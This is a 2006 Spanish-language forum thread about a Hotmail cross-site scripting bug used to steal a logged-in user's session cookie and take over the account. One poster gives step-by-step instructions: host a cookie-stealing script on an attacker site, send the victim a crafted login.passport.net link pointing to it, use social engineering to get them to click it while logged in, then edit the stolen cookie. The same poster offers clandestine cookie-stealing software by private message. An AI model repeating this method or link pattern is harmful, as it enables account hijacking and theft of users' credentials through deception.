Bueno viendo por varias paginas me encontre con que hotmail tiene un bug con el cual puedes robar la cookie de un usuario loggeado en hotmail y ver su password y otra info
http://www.net-force.nl/files/articles/hotmail_xss/ (http://www.net-force.nl/files/articles/hotmail_xss/)
aqui se explica como hacerlo enviandole un link a una pagina hecha en php... yo ya lo intente pero la pagina que mensiona ahi http://ilovemessenger.msn.com/ no me funca, talvez por que uso IE7 o no se, opr eso se los dejo aca haber si alguien lo puede hechar a andar ;D
abra ke probar con otro navegador man como opera o mozilla a ver ke asemos
Ya estoy chekando ;)
Komtec1
Pues es normal q no funcione segun la fecha ^^ 04 june 2005
P¨sss si pero chekar por si a caso ;)
Komtec1
acabo de entrar a esa pagina pero es lago el texto asiq me aburri y sali de ella XD dsp lo leo todo.. pero no estoy seguro de ello...
saludos
c_bask...
mm lo lei y algo de lo ke le entendi es que al loguearse alguien una pc en hotmail se keda guardada la cookie entonses vamos a la cookie la editamos ejecutamos el exploit y lo que segun ase es que te reconoce komo si fueras el usuario de ese hotmail mandas te vas a donde te dice mandar mi contraseña a otro correo alternativo pues me supongo ke das de alta el tuyo y hotmail te manda un nuevo password creyendo ke eres el user bueno al menos eso entendi yo mi ingles no es muy bueno jeje si me ekivoke ke alguien me corrija aun ke creo ke el bug es bastante viejo y ya debe de estar corregido pues es del 04 junio del 2005 :-\ parece ke seguiran usando troyanos y keylogger esos ke les gusta andar robando passwords de hotmail jejeje
bueno, dejenme decirles que cualquir explorador que use cookies para la sesion en hotmail puede ser objeto de ataques asi.... yo lo fui ;D
el metodo a usar es muy sencillo (no clickie ese link pero = les puedo explicar)
veran, suben su exploit a un host mas o menos rapido que se llamara en este caso www.myhost.com
luego supongamos que el archivo que robara las cookies de su victima se llame lol.js (javascript) o lol.php (ya saben)...
entonces le dicen a la victima que uds encontraron un bug en hotmail, un bug XSS, le dicen que clikeen la siguiente url
login.passport.net/calendar.php/VARIANTE_XSS="http://www.myhost.com/lol.php"
pero le dicen tambien que antes de clikear ese url deben estar logueados en hotmail... (pueden hacerlo en cualquier orden, pueden decirle primero que se loguee y luego le dan el link)
OJO: tambien se puede usar este link publicandolo en una pagina web (como un link o un boton) hecha por uds mismos con el unico proposito de explotar esta "vulnerabilidad"
luego, van al "Cookie Stealer" o Robador de cookies que deberia traerlo el software maligno del que se habla tanto.. y pues manipular el contenido de la cookie no seria mucho problema...
Conclusiones...
1) El bug aun puede ser aplicado, solo que con un poco de ing social y un gran sentido de manipulacion en la red (mover info, saber programacion, tener un buen host donde subirlo, etc)
2) El asunto debe ser estudiado con tiempo.... recomiendo que lo practiquen en un host a uds mismos primero antes de probarlo con otra persona.
3) Puedo suministrarles un software asi, pero me deben dar una lista de los que lo recibiran, ya que el software que tengo me fue concedido de forma clandestina.
4) Este tipo de temas en el foro esta PROHIBIDO, sin embargo, este tema es mas tratable y se tomara en cuenta, pero de igual forma EXIJO a los demas moderadores, se "ocupen de el" despues de unos 7 u 8 posts sin contar este.
5) quienes quieran descargar el software, deben contactarme en privado...
salu2
Les recomiendo Nikto (http://www.cirt.net/code/nikto.shtml) es un scanner de bugs XSS y CGI, es rapido y eficas (perl es necesario para correrlo).
Quote from: c_bask on July 14, 2006, 09:26:22 AM
acabo de entrar a esa pagina pero es lago el texto asiq me aburri y sali de ella XD dsp lo leo todo.. pero no estoy seguro de ello...
saludos
c_bask...
:D
k dañoo q son :S
el bug de Xss en hotmail tiene tiempo y ademas tiene mas variables que el mismo Xss,saludos :-X
Big-Perú_